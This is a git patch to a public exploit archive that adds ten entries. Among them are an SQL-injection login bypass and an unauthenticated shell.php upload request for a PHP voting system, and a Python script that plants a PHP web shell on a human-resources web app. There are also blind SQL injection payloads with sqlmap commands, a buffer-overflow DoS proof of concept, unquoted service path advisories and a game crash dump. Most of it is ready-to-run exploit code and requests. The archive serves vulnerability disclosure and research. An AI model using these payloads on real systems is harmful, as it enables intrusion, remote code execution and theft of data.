From e4f4680368c1c2ff32f7783783ea309d8e4a9a8c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 8 May 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-05-08 10 changes to exploits/shellcodes Sandboxie 5.49.7 - Denial of Service (PoC) Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path Epic Games Rocket League 1.95 - Stack Buffer Overrun Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) Voting System 1.0 - Authentication Bypass (SQLI) Voting System 1.0 - Remote Code Execution (Unauthenticated) Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021 --- exploits/multiple/webapps/49837.txt | 2 +- exploits/php/webapps/49843.txt | 60 +++++ exploits/php/webapps/49846.txt | 67 +++++ exploits/php/webapps/49847.py | 109 ++++++++ exploits/php/webapps/49849.txt | 40 +++ exploits/windows/dos/49844.py | 18 ++ exploits/windows/local/49841.txt | 56 +++++ exploits/windows/local/49842.txt | 32 +++ exploits/windows/local/49845.txt | 30 +++ exploits/windows/local/49848.txt | 378 ++++++++++++++++++++++++++++ files_exploits.csv | 11 +- 11 files changed, 801 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/49843.txt create mode 100644 exploits/php/webapps/49846.txt create mode 100755 exploits/php/webapps/49847.py create mode 100644 exploits/php/webapps/49849.txt create mode 100755 exploits/windows/dos/49844.py create mode 100644 exploits/windows/local/49841.txt create mode 100644 exploits/windows/local/49842.txt create mode 100644 exploits/windows/local/49845.txt create mode 100644 exploits/windows/local/49848.txt diff --git a/exploits/multiple/webapps/49837.txt b/exploits/multiple/webapps/49837.txt index e293ad1b6..8984b7302 100644 --- a/exploits/multiple/webapps/49837.txt +++ b/exploits/multiple/webapps/49837.txt @@ -1,6 +1,6 @@ # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 -# Exploit Author: Emircan Baş +# Exploit Author: Emircan Baş # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 diff --git a/exploits/php/webapps/49843.txt b/exploits/php/webapps/49843.txt new file mode 100644 index 000000000..b9ece07cf --- /dev/null +++ b/exploits/php/webapps/49843.txt @@ -0,0 +1,60 @@ +# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI) +# Date: 06/05/2021 +# Exploit Author: secure77 +# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB + +You can simply bypass the /admin/login.php with the following sql injection. +All you need is a bcrypt hash that is equal with your random password, the username should NOT match with an existing + + + +########################### Vulnerable code ############################ +if(isset($_POST['login'])){ + $username = $_POST['username']; + $password = $_POST['password']; + + $sql = "SELECT * FROM admin WHERE username = '$username'"; + $query = $conn->query($sql); + + if($query->num_rows < 1){ + $_SESSION['error'] = 'Cannot find account with the username'; + } + else{ + $row = $query->fetch_assoc(); + echo "DB Password: " . $row['password']; + echo "
"; + echo "
"; + echo "Input Password: " . $password; + if(password_verify($password, $row['password'])){ + echo "Equal"; + $_SESSION['admin'] = $row['id']; + } + else{ + echo "not Equal"; + $_SESSION['error'] = 'Incorrect password'; + } + } + +} +else{ + $_SESSION['error'] = 'Input admin credentials first'; +} + +########################### Payload ############################ +POST /admin/login.php HTTP/1.1 +Host: 192.168.1.1 +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 167 + +login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- - \ No newline at end of file diff --git a/exploits/php/webapps/49846.txt b/exploits/php/webapps/49846.txt new file mode 100644 index 000000000..4ae7fa02a --- /dev/null +++ b/exploits/php/webapps/49846.txt @@ -0,0 +1,67 @@ +# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated) +# Date: 07/05/2021 +# Exploit Author: secure77 +# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB + +Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE. +Your upload will be stored at /images/ and is also accessible without authentication. + + + +########################### Vulnerable code ############################ +query($sql)){ + $_SESSION['success'] = 'Candidate added successfully'; + } + else{ + $_SESSION['error'] = $conn->error; + } + + } + else{ + $_SESSION['error'] = 'Fill up add form first'; + } + + header('location: candidates.php'); +?> + +########################### Payload ############################ +POST /admin/candidates_add.php HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 275 +Cache-Control: max-age=0 +Origin: http://192.168.1.1 +Upgrade-Insecure-Requests: 1 +DNT: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/admin/candidates.php +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +------WebKitFormBoundaryrmynB2CmGO6vwFpO +Content-Disposition: form-data; name="photo"; filename="shell.php" +Content-Type: application/octet-stream + + + +------WebKitFormBoundaryrmynB2CmGO6vwFpO +Content-Disposition: form-data; name="add" \ No newline at end of file diff --git a/exploits/php/webapps/49847.py b/exploits/php/webapps/49847.py new file mode 100755 index 000000000..f6c42723e --- /dev/null +++ b/exploits/php/webapps/49847.py @@ -0,0 +1,109 @@ +# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) +# Date: 04-05-2021 +# Exploit Author: Reza Afsahi +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html +# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code +# Version: 0.1 +# Tested on: PHP 7.4.11 , Linux x64_x86 + +############################################################################################################ + +# Description: +# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. + +############################################################################################################ + +# Proof of concept: + +#!/usr/bin/python3 + +import requests +import sys +from bs4 import BeautifulSoup + +def find_shell(domain): + req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php") + soup = BeautifulSoup(req_2.content , "html.parser") + imgs = soup.find_all("img") + for i in imgs: + src = i['src'] + if ("shell.php" in src): + print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n") + break + else: + continue + +def upload_file(domain): + + print("\n [!] Uploading Shell . . .") + payload = """ + + + + Shell + + +
+ +

+ +
+{$result}"; + +?> + + + """ + + h = { + "Content-Type" : "multipart/form-data" + } + + f = {'employee_image':('shell.php',payload, + 'application/x-php', {'Content-Disposition': 'form-data'} + ) + } + d = { + "emplo" : "", + "employee_companyid" : "test", + "employee_firstname" : "test", + "employee_lastname" : "test", + "employee_middlename" : "test", + "branches_datefrom" : "0011-11-11", + "branches_recentdate" : "2222-11-11", + "employee_position" : "test", + "employee_contact" : "23123132132", + "employee_sss" : "test", + "employee_tin" : "test", + "employee_hdmf_pagibig" : "test", + "employee_gsis" : "test" + } + url = domain + "/Admin_Dashboard/process/addemployee_process.php" + req = requests.post(url , data=d , files = f) + if req.status_code == 200: + if ("Insert Successfully" in req.text): + print("\n [!] Shell uploaded succefully\n") + find_shell(domain) + + else: + print("Exploit Failed 1") + +def main(): + if len(sys.argv) != 2: + print('[!] usage: %s ' % sys.argv[0]) + print('[!] eg: %s http://vulndomain.com' % sys.argv[0]) + sys.exit(-1) + + print("<><><><><><><><><><><><><><><><><><><><><><><><>") + print("<> Human Resource Information System <>") + print("<> Shell Uploader <>") + print("<><><><><><><><><><><><><><><><><><><><><><><><>") + target_domain = sys.argv[1] + upload_file(target_domain) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/49849.txt b/exploits/php/webapps/49849.txt new file mode 100644 index 000000000..5449c5709 --- /dev/null +++ b/exploits/php/webapps/49849.txt @@ -0,0 +1,40 @@ +# Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection +# Date: 03.05.2021 +# Exploit Author: Tyler Butler +# Vendor Homepage: http://timeclock.sourceforge.net +# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ +# Version: 1.04 +# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5 + + +Description: PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents + +Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass +Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass + + +Steps to reproduce: + 1. Run sqlmap against a instance of PHP Timeclock + 2. Follow the instructions below for specific versions of MySQL + + +MySQL >= 5.0.12: + +$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db +--- +Parameter: login_userid (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass +--- + + +MySQL < 5: On versions using MySQL < 5, table names must be included as arguments as information_schema was not introduced into MySQL yet. + +$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v +--- +Parameter: login_userid (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass +--- \ No newline at end of file diff --git a/exploits/windows/dos/49844.py b/exploits/windows/dos/49844.py new file mode 100755 index 000000000..8ae3b1fcd --- /dev/null +++ b/exploits/windows/dos/49844.py @@ -0,0 +1,18 @@ +# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC) +# Date: 06/05/2021 +# Author: Erick Galindo +# Vendor Homepage: https://sandboxie-plus.com/ +# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe +# Version: 5.49.7 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Sandboxie Control->Sandbox->Set Container Folder +#3.- Paste the buffer in the input then press ok + +buffer = "\x41" * 5000 + +f = open ("Sandboxie10.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/49841.txt b/exploits/windows/local/49841.txt new file mode 100644 index 000000000..1ae4789b4 --- /dev/null +++ b/exploits/windows/local/49841.txt @@ -0,0 +1,56 @@ +# Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation +# Date: 04.05.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.epicgames.com https://www.easy.ac + +Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation + + +Vendor: Epic Games, Inc. +Product web page: https://www.epicgames.com + https://www.easy.ac +Affected version: 4.0.0.0 + +Summary: Easy Anti-Cheat is the industry-leading anti–cheat service, +countering hacking and cheating in multiplayer PC games through the +use of hybrid anti–cheat mechanisms. + +Desc: The application suffers from an unquoted search path issue impacting +the service 'EasyAntiCheat' for Windows deployed as part of Easy Anti-Cheat +Service application. This could potentially allow an authorized but non-privileged +local user to execute arbitrary code with elevated privileges on the system. +A successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. + +Tested on: Microsoft Windows 10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5652 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php + + +04.05.2021 + +-- + + +C:\Users>sc qc EasyAntiCheat +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: EasyAntiCheat + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : EasyAntiCheat + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49842.txt b/exploits/windows/local/49842.txt new file mode 100644 index 000000000..f02cb4f17 --- /dev/null +++ b/exploits/windows/local/49842.txt @@ -0,0 +1,32 @@ +# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path +# Discovery by: Erick Galindo +# Discovery Date: 2020-05-06 +# Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe +# Tested Version: 0.7.4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es +# Step to discover Unquoted Service Path: + +C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """ +Sandboxie Service SbieSvc C:\Program Files\Sandboxie-Plus\SbieSvc.exe Auto + +# Service info + +sc qc "SbieSvc" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SbieSvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe + GRUPO_ORDEN_CARGA : UIGroup + ETIQUETA : 0 + NOMBRE_MOSTRAR : Sandboxie Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +#Exploit: + +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49845.txt b/exploits/windows/local/49845.txt new file mode 100644 index 000000000..e6ecde936 --- /dev/null +++ b/exploits/windows/local/49845.txt @@ -0,0 +1,30 @@ +# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path +# Discovery by: Erick Galindo +# Discovery Date: 2020-05-06 +# Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe +# Tested Version: 1.0.0.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es +# Step to discover Unquoted Service Path: + +c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ +MainService WifiHotSpotSvc C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe Auto + +# Service info +sc qc wifihotspotsvc +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: wifihotspotsvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : MainService + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49848.txt b/exploits/windows/local/49848.txt new file mode 100644 index 000000000..544900b2f --- /dev/null +++ b/exploits/windows/local/49848.txt @@ -0,0 +1,378 @@ +# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun +# Date: 25.04.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com + +Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun + + +Vendor: Epic Games Inc. | Psyonix, LLC +Product web page: https://www.epicgames.com + https://www.psyonix.com + https://www.rocketleague.com +Affected version: <=1.95 + +Summary: Rocket League is a high-powered hybrid of arcade-style soccer +and vehicular mayhem with easy-to-understand controls and fluid, physics-driven +competition. + +Desc: The game suffers from a stack-based buffer overflow vulnerability. The +issue is caused due to a boundary error in the processing of a UPK format file, +which can be exploited to cause a stack buffer overflow when a user crafts the +file with a large array of bytes inserted in the vicinity offset after the magic +header. Successful exploitation could allow execution of arbitrary code on the +affected machine. + +Tested on: Microsoft Windows 10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5651 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php + + +25.04.2021 + +-- + + +Craft location: ..\rocketleague\TAGame\CookedPCConsole +Header: C1 83 2A 9E 64 03 1F 00 + +hat_Headphones_SF.upk: +---------------------- +... +... +ModLoad: 00007ff9`99ff0000 00007ff9`9a016000 C:\WINDOWS\system32\ncryptsslp.dll +ModLoad: 00007ff9`32d70000 00007ff9`36a00000 C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll +ModLoad: 00007ff9`315b0000 00007ff9`32d68000 C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll +ModLoad: 00000000`00400000 00000000`0041e000 E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll +ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000 C:\WINDOWS\SYSTEM32\TextShaping.dll +[0110.33] Log: Timed out while waiting for GPU to catch up. (500 ms) +(62c.1074): Unknown exception - code 00000001 (!!! second chance !!!) +KERNELBASE!RaiseException+0x69: +00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] +0:024> r +rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000 +rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700 +rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000 + r8=000000214edfedb0 r9=0000000000000000 r10=00000000000000c0 +r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0 +r14=00007ff776dab710 r15=000000214edff8a0 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000204 +KERNELBASE!RaiseException+0x69: +00007ff9`a0364b59 0f1f440000 nop dword ptr [rax+rax] +0:024> !analyze -v +******************************************************************************* +* * +* Exception Analysis * +* * +******************************************************************************* + +*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll - +GetUrlPageData2 (WinHttp) failed: 12002. + +DUMP_CLASS: 2 +DUMP_QUALIFIER: 0 + +FAULTING_IP: +KERNELBASE!RaiseException+69 +00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] + +EXCEPTION_RECORD: (.exr -1) +ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069) + ExceptionCode: 00000001 + ExceptionFlags: 00000000 +NumberParameters: 0 + +FAULTING_THREAD: 00000490 +DEFAULT_BUCKET_ID: APPLICATION_FAULT +PROCESS_NAME: RocketLeague.exe +ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1 +EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function. +EXCEPTION_CODE_STR: 1 +WATSON_BKT_PROCSTAMP: 606f6afa +WATSON_BKT_PROCVER: 1.0.10897.0 +PROCESS_VER_PRODUCT: Rocket League +WATSON_BKT_MODULE: KERNELBASE.dll +WATSON_BKT_MODSTAMP: 2f2f77bf +WATSON_BKT_MODOFFSET: 34b59 +WATSON_BKT_MODVER: 10.0.19041.906 +MODULE_VER_PRODUCT: Microsoft® Windows® Operating System +BUILD_VERSION_STRING: 10.0.19041.928 (WinBuild.160101.0800) +MODLIST_WITH_TSCHKSUM_HASH: ac197712fdc57f2bb67f9b17107e5701c93b4362 +MODLIST_SHA1_HASH: 342698e051c108fd7be71346f5d34f8a14c38381 +NTGLOBALFLAG: 0 +PROCESS_BAM_CURRENT_THROTTLED: 0 +PROCESS_BAM_PREVIOUS_THROTTLED: 0 +APPLICATION_VERIFIER_FLAGS: 0 +PRODUCT_TYPE: 1 +SUITE_MASK: 784 +DUMP_TYPE: fe +ANALYSIS_SESSION_HOST: LAB17 +ANALYSIS_SESSION_TIME: 04-25-2021 13:23:34.0003 +ANALYSIS_VERSION: 10.0.16299.91 amd64fre +THREAD_ATTRIBUTES: +OS_LOCALE: ENU + +PROBLEM_CLASSES: + + ID: [0n308] + Type: [APPLICATION_FAULT] + Class: Primary + Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) + BUCKET_ID + Name: Add + Data: Omit + PID: [Unspecified] + TID: [Unspecified] + Frame: [0] + +BUGCHECK_STR: APPLICATION_FAULT +PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT +LAST_CONTROL_TRANSFER: from 00007ff78f1cbf65 to 00007ffed4d64b59 + +STACK_TEXT: +00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 00000089`23dfea20 : KERNELBASE!RaiseException+0x69 +00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245 +00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95 +00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6 +00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479 +00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0 +00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 +00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 + +THREAD_SHA1_HASH_MOD_FUNC: b03d2da27c20caaf2a76cdae45ff251160c76115 +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ff5c11b082c48239ef2666814fc4e06663a8c892 +THREAD_SHA1_HASH_MOD: 96a23e97d7538141fe1b904de60919531df8b505 + +FOLLOWUP_IP: +RocketLeague!GetOutermost+29245 +00007ff7`8f1cbf65 eb13 jmp RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a) + +FAULT_INSTR_CODE: 8b4813eb +SYMBOL_STACK_INDEX: 1 +SYMBOL_NAME: rocketleague!GetOutermost+29245 +FOLLOWUP_NAME: MachineOwner +MODULE_NAME: RocketLeague +IMAGE_NAME: RocketLeague.exe +DEBUG_FLR_IMAGE_TIMESTAMP: 606f6afa +STACK_COMMAND: ~24s ; .cxr ; kb +FAILURE_BUCKET_ID: APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost +BUCKET_ID: APPLICATION_FAULT_rocketleague!GetOutermost+29245 +FAILURE_EXCEPTION_CODE: 1 +FAILURE_IMAGE_NAME: RocketLeague.exe +BUCKET_ID_IMAGE_STR: RocketLeague.exe +FAILURE_MODULE_NAME: RocketLeague +BUCKET_ID_MODULE_STR: RocketLeague +FAILURE_FUNCTION_NAME: GetOutermost +BUCKET_ID_FUNCTION_STR: GetOutermost +BUCKET_ID_OFFSET: 29245 +BUCKET_ID_MODTIMEDATESTAMP: 606f6afa +BUCKET_ID_MODCHECKSUM: 251425f +BUCKET_ID_MODVER_STR: 1.0.10897.0 +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_ +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT +FAILURE_SYMBOL_NAME: RocketLeague.exe!GetOutermost +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1 +TARGET_TIME: 2021-04-25T11:23:44.000Z +OSBUILD: 19042 +OSSERVICEPACK: 928 +SERVICEPACK_NUMBER: 0 +OS_REVISION: 0 +OSPLATFORM_TYPE: x64 +OSNAME: Windows 10 +OSEDITION: Windows 10 WinNt SingleUserTS Personal +USER_LCID: 0 +OSBUILD_TIMESTAMP: 2022-01-18 11:29:28 +BUILDDATESTAMP_STR: 160101.0800 +BUILDLAB_STR: WinBuild +BUILDOSVER_STR: 10.0.19041.928 +ANALYSIS_SESSION_ELAPSED_TIME: 795d +ANALYSIS_SOURCE: UM +FAILURE_ID_HASH_STRING: um:application_fault_1_rocketleague.exe!getoutermost +FAILURE_ID_HASH: {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c} +Followup: MachineOwner +... +... + +(aa0.3818): Unknown exception - code 00000001 (first chance) +(aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!) +KERNELBASE!RaiseException+0x69: +00007ffe`d4d64b59 0f1f440000 nop dword ptr [rax+rax] +0:024> g +[0188.65] Warning: Warning, Detected data corruption [header] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. +[0188.65] Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.65] Critical: Windows GetLastError: The operation completed successfully. (0) +[0188.65] Warning: Warning, Detected data corruption [undershoot] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. +[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.65] Warning: Warning, Detected data corruption [incorrect uncompressed size] calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. +[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' +[0188.66] DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout +[0188.66] DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409 + + + +hat_peanut_SF.upk: +------------------ +... +... +0:077> g +(3568.230c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +VCRUNTIME140!memcmp+0xee: +00007ffe`afc812de f3a4 rep movs byte ptr [rdi],byte ptr [rsi] +0:000> r +rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4 +rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000 +rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec + r8=ffffffff9c71ffec r9=00000000000000ff r10=000001a1a49a2bff +r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000 +r14=0000009852afeaf8 r15=0000000000000000 +iopl=0 nv up ei pl nz na pe nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 